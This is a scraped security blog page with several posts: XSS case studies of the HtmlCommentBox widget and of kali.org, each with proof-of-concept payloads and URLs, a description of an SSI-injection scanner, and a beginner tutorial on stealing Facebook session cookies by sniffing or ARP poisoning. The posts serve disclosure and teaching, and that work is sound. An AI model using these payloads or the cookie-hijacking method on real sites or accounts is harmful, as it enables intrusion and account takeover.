Introducing Evil In Your Website With Untrusted Third Party Scripts

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOPFZCmS7IMb_VifWHQ_flsNcjWCfwOL7UO3Mqe-PIB7NtapGvml34qpBd_U2ujh5WsYBnLEDsPb3kdteZNdDhSAFpXweeHe2859j7tm__C6c6MOsSRzeymKUV2T1nnYEqDVg2v_4zfw4/s1600/Evil-Clown-horror-world-23601543-500-375.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOPFZCmS7IMb_VifWHQ_flsNcjWCfwOL7UO3Mqe-PIB7NtapGvml34qpBd_U2ujh5WsYBnLEDsPb3kdteZNdDhSAFpXweeHe2859j7tm__C6c6MOsSRzeymKUV2T1nnYEqDVg2v_4zfw4/s320/Evil-Clown-horror-world-23601543-500-375.jpg" width="320" /></a></div><br />This is a small case study, where my aim is to explain why you shouldn't use untrusted third party scripts on your website. Htmlcommentbox is a third part script that could be embedded into any webpage would bring a place where users can comment and interact with each, I feel it is poorly coded from both user's perspective and security perspective as it could introduce lots of spam in your website.<br /><br />Let's talk about what else could it do else than introducing spam from security perspective. We [<b>Me and Pepe Vila]</b> have found two attack vectors with the <b>HtmlCommentBox as </b>Does not sanitise the user input's properly resulting in a stored xss and also a reflected xss, which obviously leaves wide variety of attack vectors from the attacker's perspective.<br /><div><a name="more"></a></div><div><h4>Stored XSS POC</h4></div><div>The POC is very simple, Seems like that you can inject any thing as long as you don't close the tag:</div><div><br /></div><div><b>Example:</b></div><div><br /><i><img src=x onerror=prompt(0);</i></div><div><i><iframe/onload=prompt(0);</i></div><div><i><svg/onload=prompt(0);</i></div><div><br /></div><div>Let's see a demonstration of this on their live website where they themselves have hosted their htmlcommentbox making their website vulnerable to the stored XSS too.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimL1BRb9NP1nfiOak73rxgvkCs0DP4Ipk1bWJJzg88Z3EaXnDQumyovJfhzzShDhQDJBlmmq7qayfoUdCreJRjZjhISdN77e7ouuU4unPv6GXNnvnUj4o8x-eNN6m8mUK4LDmZ4FN_sUI/s1600/rafay.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimL1BRb9NP1nfiOak73rxgvkCs0DP4Ipk1bWJJzg88Z3EaXnDQumyovJfhzzShDhQDJBlmmq7qayfoUdCreJRjZjhISdN77e7ouuU4unPv6GXNnvnUj4o8x-eNN6m8mUK4LDmZ4FN_sUI/s640/rafay.png" width="577" /></a></div><div><br /></div><div><br /></div><div><a href="http://www.htmlcommentbox.com/feature-requests.html#.UaiW00BkOuI" rel="nofollow" target="_blank">http://www.htmlcommentbox.com/feature-requests.html#.UaiW00BkOuI</a></div><div><br /></div><div>The following page is where, users can request for additional features, as you can clearly see from the picture that it is using the htmlcommentbox. All, i did was to inject the following payload into the messagebox:</div><div><br /></div><div><b><img src=x onerror=prompt(0);</b></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjEuxDVEYON9R4M6rzUX4dJHqHPrCLegZyvFXAW50lSSoHy6J_dU8yUyZS03BlFX9LDsaTNLLlI53wovfKgQVdc9kZqA_EddVQuKDjl8k-ESOTlgPPOEGE0D6Nuh1FpqgUlUJBGRjpPE/s1600/rafay2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinjEuxDVEYON9R4M6rzUX4dJHqHPrCLegZyvFXAW50lSSoHy6J_dU8yUyZS03BlFX9LDsaTNLLlI53wovfKgQVdc9kZqA_EddVQuKDjl8k-ESOTlgPPOEGE0D6Nuh1FpqgUlUJBGRjpPE/s640/rafay2.png" width="577" /></a></div><div><br /></div><div><div><h4>Second Issue - Reflected XSS</h4></div></div><div>Well, this is not it, We have more for you, Implementing HTMLCommentBox also makes your website vulnerable to a non persistent xss.<br /><br />Let's take a closer look at their script that users would implement on their page:</div><div><br /></div><blockquote class="tr_bq"><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">(function(){var s=document.createElement("</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">script"),</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">l=(""+window.location || hcb_user.PAGE),</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">h="//</span><a href="http://www.htmlcommentbox.com/" style="background-color: white; color: #1155cc; font-family: arial, sans-serif; font-size: 13px;" target="_blank">www.<span class="il" style="background-color: #ffffcc; background-position: initial initial; background-repeat: initial initial; color: #222222;">htmlcommentbox</span>.com</a><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">";</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">s.setAttribute("type","text/</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">javascript");s.setAttribute("</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">src",</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">h+"/jread?page="+</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">encodeURIComponent(l).replace(</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">"+","%2B")+"&opts=16862&num=</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">10");if</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">(typeof s!="undefined")</span><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">document.getElementsByTagName(</span><wbr style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;"></wbr><span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 13px;">"head")[0].appendChild(s);})()</span></blockquote><div>If you closely look at the window.location portion, you would find that <b>encodeURIComponent </b>allows single quotes. If we just replace window.location with our alert statement, it would triggered under the script context, Hence making the website vulnerable to a xss. And the <b>/jread?page='-prompt(1)-'&opt=x&num=y</b>, this would be reflected under the page context.</div><div>So the POC would be as follows:</div><div><br /></div><div><b>http://www.htmlcommentbox.com/?'-prompt(1)-'</b></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV56hIRbpLqkfm7DV9FyK6Y853brKFTYEt7Cxoc6Y_fKbaNeY8WzTFrJE-MKE9-AyVAFR-n9LibSVfcKrv8i6lKfGAtDLIBgwgO6m5973yfHcLAwTl4jfOQvm8g43pJoXMTzp6OuoPbUo/s1600/rafay3.png" imageanchor="1"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV56hIRbpLqkfm7DV9FyK6Y853brKFTYEt7Cxoc6Y_fKbaNeY8WzTFrJE-MKE9-AyVAFR-n9LibSVfcKrv8i6lKfGAtDLIBgwgO6m5973yfHcLAwTl4jfOQvm8g43pJoXMTzp6OuoPbUo/s640/rafay3.png" width="577" /></a></div><div><br /></div><div><br /></div><div><b>Again, I am very thankful to @pepevila for pointing the second issue. </b><br /><br />The lesson to be learned is business that rely on or use third part scripts on their website, Should use well known scripts and make sure that they are not vulnerable to any attacks or atleast research if their haven't been any issues with them in past, because often times these third party scripts are responsible for the security breaches.<br /><br />Take an example from this case study, Where using a third party script to host comments introduced High risk security vulnerabilities. Any one using this script on their websites are requested to immediately remove it.</div></div>

Introducing Evil In Your Website With Untrusted Third Party Scripts

This is a small case study, where my aim is to explain why you shouldn't use untrusted third party scripts on your website. Htmlcommentb...

+ Read more »

Server Side Includes Vulnerability - SSI SCAN [TOOL]

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLA-9vBsXrieguUXfKn6jp3dCgPIXJ3JgjjrqZMtNSHyIpEl3YFVA-ToBu7eBB-TKSO3uBw7c3OuOfiEnpnJpXCTUGDCioqS9y2rGHDZ1-LNxaekylZoIYw4sInA9tK2aR0NLV-sxo4rg/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLA-9vBsXrieguUXfKn6jp3dCgPIXJ3JgjjrqZMtNSHyIpEl3YFVA-ToBu7eBB-TKSO3uBw7c3OuOfiEnpnJpXCTUGDCioqS9y2rGHDZ1-LNxaekylZoIYw4sInA9tK2aR0NLV-sxo4rg/s320/1.jpg" width="320" yya="true" /></a></div>SSI-Scan is a basic PoC tool that helps facilitate the discovery of SSI injection vulnerabilities, a fairly rare and underdocumented code injection vulnerability where Server Side Includes directives are executed without proper validation and may lead to a system compromise.<br /><br />The tool at this stage, among its core functionality, supports basic server enumeration, web form enumeration, HTML comment and SSI directive discovery, extension checking, logging scans to a file and connection to host via HTTP proxy.<br /><a name="more"></a>SSI-Scan discovers vulnerabilities so far by two ways: the default method of sending a hardcoded SSI payload encapsulated within an HTTP POST request, or the manual method of injecting username and password forms through their respective switches. In both cases, it looks for environment variable matches in the source. Before using this tool, it is recommended you learn more about SSI injection from the following resources:<br /><br /><a href="https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection" rel="nofollow" target="_blank">https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection</a><br /><a href="http://capec.mitre.org/data/definitions/101.html">http://capec.mitre.org/data/definitions/101.html</a><br /><br /><strong>BASIC USAGE:</strong><br /><br />Starting the tool without any parameters will yield the list of<br />arguments and what they do.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaMx3gohOnh9GP5zh1D8ek55t2KJ79-2Pb0hYTYqFBBESvlZjVFGS92SnYPU5liMac11-T5yGsKvI9MbifWSfh6xwhJ4EjMwE_A9i_kchyphenhyphenJT-JurMty_4u_drKHCeo3s2IGVJHrfHIkWk/s1600/SSyJckV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaMx3gohOnh9GP5zh1D8ek55t2KJ79-2Pb0hYTYqFBBESvlZjVFGS92SnYPU5liMac11-T5yGsKvI9MbifWSfh6xwhJ4EjMwE_A9i_kchyphenhyphenJT-JurMty_4u_drKHCeo3s2IGVJHrfHIkWk/s640/SSyJckV.png" width="577" yya="true" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Basic scanning is done via the -u option, e.g<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVU-0VJWkW6wU6r6XeGMHd2t7bh7pBKCMwkVDWhLYvA3qKBqiqHomRZao4AYdXcKnejM4JxBAZi_EkEoy1zENath7JQp1Vn2xkHj3exQpVoFhh7VHlwPVrSkxgJzYpWQAXGAvZAd1NvEc/s1600/u5LuZgm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVU-0VJWkW6wU6r6XeGMHd2t7bh7pBKCMwkVDWhLYvA3qKBqiqHomRZao4AYdXcKnejM4JxBAZi_EkEoy1zENath7JQp1Vn2xkHj3exQpVoFhh7VHlwPVrSkxgJzYpWQAXGAvZAd1NvEc/s640/u5LuZgm.png" width="577" yya="true" /></a></div><br />If the default POST payload doesn't work (as in above), the tool will display a recommendation that you specifically target the forms with the --form_uname and --form_passwd switches. This will skip most of the<br />other enumeration functions. <br /><br /><strong>For example:</strong><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJn33s-kGPJT4Nc-n9Yls8X323cj744hZZfsbE-9CtExrlf32XqEW-WT8JADNJT03m30_GPv9Dk5LSGbl2gLlWpxllqJsTNhHCBokxMs4dtqWZ_Z1cJOvOJNkH1P6Ka5RO2XPHj2VxLL8/s1600/X2HB1j8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJn33s-kGPJT4Nc-n9Yls8X323cj744hZZfsbE-9CtExrlf32XqEW-WT8JADNJT03m30_GPv9Dk5LSGbl2gLlWpxllqJsTNhHCBokxMs4dtqWZ_Z1cJOvOJNkH1P6Ka5RO2XPHj2VxLL8/s640/X2HB1j8.png" width="577" yya="true" /></a></div><br />The page has now clearly been proven to be injection positive. It is up to the user to manually research further into it, as SSI-Scan is not yet an exploitation tool, but likely will be in the near future.<br /><br /><strong>ADVANCED USAGE:</strong><br /><br />The --logtofile <strong><FILENAME_HERE></strong> switch can be used to log scans to a file. Since it works by redirecting sys.stdout to a new variable, all output will be hidden during the duration of a scan, minus a "Log mode enabled" message. <br /><br />The output can then be viewed from the specified file. The <strong>--proxy</strong> <strong><IP:PORT></strong> switch can be used to conduct a scan through an <strong>HTTP proxy</strong> (note that this can be substantially slower depending on the<br />proxy). A message displaying "Using proxy server at<strong> <IP address:port>"</strong>will appear on top.<br /><br />--listvars is a placeholder switch that displays a partial list of SSI/CGI environment variables for informative purposes and potential future use.</div>

Server Side Includes Vulnerability - SSI SCAN [TOOL]

SSI-Scan is a basic PoC tool that helps facilitate the discovery of SSI injection vulnerabilities, a fairly rare and underdocumented code in...

+ Read more »

How I Hack Your Facebook By Stealing Your Cookies

<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><img height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrV-mxEQNTXMjjCG8QdPxZeb8ydFhGKmiVZroQ1Ppe11v-hXQxsf3JNk2KfF8Z2DgRmpkQl1FZHkTAaBN8yOIMdSdkRufVqvp3HZwkKIWaVXQo_ssBppoIIlaSLvKcB227PW1e-u96vFw/s640/facebook_hacked.jpg" width="577" /><br /><br />We have already written several posts on<b> <a href="http://www.rafayhackingarticles.net/2012/10/hack-facebook-account-with-arp-poisoning.html" target="_blank">hacking a facebook account</a></b> and the article that sparked the most of the reader's interest was on <b>"<a href="http://www.rafayhackingarticles.net/2012/10/hack-facebook-account-with-arp-poisoning.html" target="_blank">Hack A Facebook Account With ARP Poisoning</a>". </b>However, still as you can clearly see from the comments that there are lost of issues with the readers especially the beginners with replicating the process. So, I have recorded a video in which i will show you step by step how an attacker sitting on your local area network (Wifi) could steal your cookies and hack your facebook account. However, if you are sniffing on a LAN instead of WLAN, you would need to perform an <b>ARP Spoofing attack</b>.<br /><a name="more"></a><br /><h4>Lan Sniffing - Core Concepts</h4><ul><li>If you are sniffing on a local area network (LAN), first of all you should make sure that your Network card is in the promiscuous mode. </li></ul><ul><li>Next up you should know the difference between a hub and a switch based network, in case of a hub based network a normal packet sniffer would do the job, however in case of a switch based network we would need to launch an attack called <b>"ARP Poisoning attack</b>" or <b>"Man in the Middle attack"</b> in order to route the victims traffic through us.</li></ul><div><div class="separator" style="background-color: white; clear: both; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; text-align: center;"><b><i><u>Monitor a Facebook Account from any where in the world</u></i></b></div><div class="separator" style="background-color: white; clear: both; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; text-align: center;"><a href="http://www.rafayhackingarticles.net/2010/01/remote-password-hacking-software_07.html" style="border: none; color: #666666; text-decoration: none;" target="_blank"><img border="0" src="http://www.sniperspy.com/images/bnr/521396066_336x280.gif" style="border-width: 0px; padding: 10px;" /></a></div></div><div>I have recorded a video, in which, i will show you how an attacker can sniff/capture http cookies for facebook, the two cookies that are important to us are <b>c_user</b> and <b>xs</b>, because they are facebook's authentication cookies. </div><div><br /></div><div><br /></div></div><iframe allowfullscreen="" frameborder="0" height="300" mozallowfullscreen="" src="http://player.vimeo.com/video/66927621" webkitallowfullscreen="" width="577"></iframe></div>

How I Hack Your Facebook By Stealing Your Cookies

We have already written several posts on hacking a facebook account  and the article that sparked the most of the reader's interest was...

+ Read more »

Kali Linux DOM Based XSS Writeup

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0gXfptzDeN178HKpIfrkRQH3lVGIrThgvQtDpoKAzSgv76Upo0fNo9SjtSy2aDHS3bfgNw7LNIGP4fLIKuFgyGGh1Pnpw4sA9Cw6O83lxLp5nUBwbiQC8Drei7Hush6419XQGSQPOzq0/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0gXfptzDeN178HKpIfrkRQH3lVGIrThgvQtDpoKAzSgv76Upo0fNo9SjtSy2aDHS3bfgNw7LNIGP4fLIKuFgyGGh1Pnpw4sA9Cw6O83lxLp5nUBwbiQC8Drei7Hush6419XQGSQPOzq0/s400/images.jpg" width="400" /></a></div><br />Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in <a href="http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html" target="_blank">Microsoft</a>. Unlike others, this particular XSS occurs in client side javascript.<br /><a name="more"></a><br />In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. <a href="https://code.google.com/p/domxsswiki/" rel="nofollow" target="_blank">DOM based XSS wiki </a>is a good source where you would find dangerous sources and sinks.<br /><br />On checking out the source of kali.org, i immediately found out that i was running <b>wordpress version 3.5.1</b>, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXXJOZbYAQ7-dv22krInK3MucxwrDDAUyp6vuV11zFDIJXMdbbtCIfaph3G1dSRlysF8Uw8Myl8ratRNdisQHzf4ULE7xgVSH8_EMW4z6BKNVjaJDSBKuPXxHqcAtcm3qwOhtL_5FQq54/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXXJOZbYAQ7-dv22krInK3MucxwrDDAUyp6vuV11zFDIJXMdbbtCIfaph3G1dSRlysF8Uw8Myl8ratRNdisQHzf4ULE7xgVSH8_EMW4z6BKNVjaJDSBKuPXxHqcAtcm3qwOhtL_5FQq54/s640/1.png" width="577" /></a></div><br />I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin <b>"WP-Pretty Photo" </b>which caught my interest. Which is a jquery based lightbox for wordpress platform.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUJ0IEZkmwqEE2revCwNLdIsm4d9sTZb_mX9X05zgAfY9Y8P1gRrqsHCci6o_jTQCa459wXV7zHwdvQt0soDE7w7IXqbdEordTpy5CtGUEjDbt5sNcsJFdB9nh0PkeNdZICjI_Cg2JpX4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUJ0IEZkmwqEE2revCwNLdIsm4d9sTZb_mX9X05zgAfY9Y8P1gRrqsHCci6o_jTQCa459wXV7zHwdvQt0soDE7w7IXqbdEordTpy5CtGUEjDbt5sNcsJFdB9nh0PkeNdZICjI_Cg2JpX4/s640/2.png" width="577" /></a></div><br />Next i performed a detailed analysis on the prettyphoto.js file, hunting for DOM based XSS. After my analysis i managed to construct a valid payload to trigger the DOM based XSS. You can find my detailed analysis about the prettyphoto.js DOM xss vulnerability <a href="http://cxsecurity.com/issue/WLB-2013110149" rel="nofollow" target="_blank">here</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-muJ5u3f_4STPRkchLwuB72IX-PvTzz9qFgxoKU7wPAbs6HVDL4e0b0Vtj9hOTTZLMtwwbHz0zzl35ABqZfc0x-MK37r3d1oYJBYZKe_kBR0tnZfJGoixcCn9HRKrkrflUJD2xDZ7CI/s1600/rafay.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn-muJ5u3f_4STPRkchLwuB72IX-PvTzz9qFgxoKU7wPAbs6HVDL4e0b0Vtj9hOTTZLMtwwbHz0zzl35ABqZfc0x-MK37r3d1oYJBYZKe_kBR0tnZfJGoixcCn9HRKrkrflUJD2xDZ7CI/s640/rafay.png" width="577" /></a></div><b><br /></b><b><br /></b><br /><b>POC:</b><br /><b><br /></b><b><i>http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//</i></b><br /><br />Some debugging with chrome JS console, led me to the <b>line 79 </b>of the <b>jquery.prettyPhoto.js</b>, the line of code which was responsible for the cause of the DOM Based XSS.<br /><i><b><br /></b></i><i><b>http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1</b></i><br /><i><b><br /></b></i><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcts6VpHl2JMCgObZH-m2M_2qkM_TzKtYRSnq85eACEGUiCztcjBkPmgclRxdMQP5OiC1vwnazwmXkju3zRGy5Q_YSe43509YBHgSSNxGY5NgPxosMPtz-8YNd8Hm0byt_5Ca01tyA4go/s1600/untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcts6VpHl2JMCgObZH-m2M_2qkM_TzKtYRSnq85eACEGUiCztcjBkPmgclRxdMQP5OiC1vwnazwmXkju3zRGy5Q_YSe43509YBHgSSNxGY5NgPxosMPtz-8YNd8Hm0byt_5Ca01tyA4go/s640/untitled.png" width="577" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>It was also obvious from the code that it required us ! sign to successfully execute the javascript.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQqemNnaSLQnWRe05NFlQthE1EIgr_JTHN24uM_-MruykVvOhqWXWIMgmXhpOzZstDlokaUVWhUavZxiFxlGG3cjioiRpd6CTzCSGpAGnsecmGLeeOjqlp7ppJkN9ljd2k_wYsmd4ckI/s1600/new.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQqemNnaSLQnWRe05NFlQthE1EIgr_JTHN24uM_-MruykVvOhqWXWIMgmXhpOzZstDlokaUVWhUavZxiFxlGG3cjioiRpd6CTzCSGpAGnsecmGLeeOjqlp7ppJkN9ljd2k_wYsmd4ckI/s640/new.png" width="577" /></a></div><br />The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.<br /><b><br /></b><b>The Fix</b><br /><br />The following url discusses, about the fix:<br /><br /><a href="https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc" rel="nofollow" target="_blank">https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc</a><br /><br />If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzQMEDA1Xljo93YwzeApw5Htapqhz-bTaS3196QwB2RtezYX3FiJ6_dO4026q5IHGEiHj3m2LqpndbdlwREJzWsTuIZNPhGkuN8RBftwdiTDGVie_x5FbX4Zu30MwZaWXQm14S1hQSmw/s1600/268818_10151517350038001_194305879_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCzQMEDA1Xljo93YwzeApw5Htapqhz-bTaS3196QwB2RtezYX3FiJ6_dO4026q5IHGEiHj3m2LqpndbdlwREJzWsTuIZNPhGkuN8RBftwdiTDGVie_x5FbX4Zu30MwZaWXQm14S1hQSmw/s640/268818_10151517350038001_194305879_n.jpg" width="577" /></a> </div>I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyfrDVmS2elPhuQQNM475iTe_tmvluFgoTVadYspTbo-rIqPe2dAZL87H7y15-8sJ3c846UNM_23vJsyRe739aP5QlOH2d6j06jGRpqGkbNZjIXKsBgMGPDF2eBS_HnY323-R-rHJx4jU/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyfrDVmS2elPhuQQNM475iTe_tmvluFgoTVadYspTbo-rIqPe2dAZL87H7y15-8sJ3c846UNM_23vJsyRe739aP5QlOH2d6j06jGRpqGkbNZjIXKsBgMGPDF2eBS_HnY323-R-rHJx4jU/s640/Untitled.png" width="577" /></a></div><br /><br />I would like that every one would be act the same way i did and responsibly disclose every issue you find.</div>

Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security...

+ Read more »

How Was 1337day.com Hacked?

<div dir="ltr" style="text-align: left;" trbidi="on">Today, in the morning when i browsed to <b>1337day.com</b> (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named <b>"Turkguvenligi"</b>, In past Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUkZHlE5jeEM0NsHZYkzwVtsVVJ-zVYdZpy8BDMjz4mCffFPhmr0Xlh2QbCg_hFzvWhJKWUhlZx8lR4jcc4DDzrtus51948OFrhN99iStLygDQMvwGtaG6MiSA3MeSftGD0b0vcrsN9hs/s1600/BKVvp5ICEAEb4-x+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUkZHlE5jeEM0NsHZYkzwVtsVVJ-zVYdZpy8BDMjz4mCffFPhmr0Xlh2QbCg_hFzvWhJKWUhlZx8lR4jcc4DDzrtus51948OFrhN99iStLygDQMvwGtaG6MiSA3MeSftGD0b0vcrsN9hs/s640/BKVvp5ICEAEb4-x+(1).png" width="577" /></a></div><br /><a name="more"></a>On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to <b>http://www.1337day.com/author/5819</b>, i website was first appeared to be inaccessible, later it showed the following message:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj79wyEURWfjtA2wZ3rLaBvXuypJzA1ZoUOqwEdBZsSBbJ34Q4qs82h1-AN_hHgV0PYJsMpqfKphB4sTpMrlZXV6dTcDxD4Wy9nA-HhPT9bQsYGOUt0Q1BfAv3ewmmxE-1gDY96uySb_U/s1600/Untitled1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj79wyEURWfjtA2wZ3rLaBvXuypJzA1ZoUOqwEdBZsSBbJ34Q4qs82h1-AN_hHgV0PYJsMpqfKphB4sTpMrlZXV6dTcDxD4Wy9nA-HhPT9bQsYGOUt0Q1BfAv3ewmmxE-1gDY96uySb_U/s640/Untitled1.png" width="577" /></a></div><br />However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 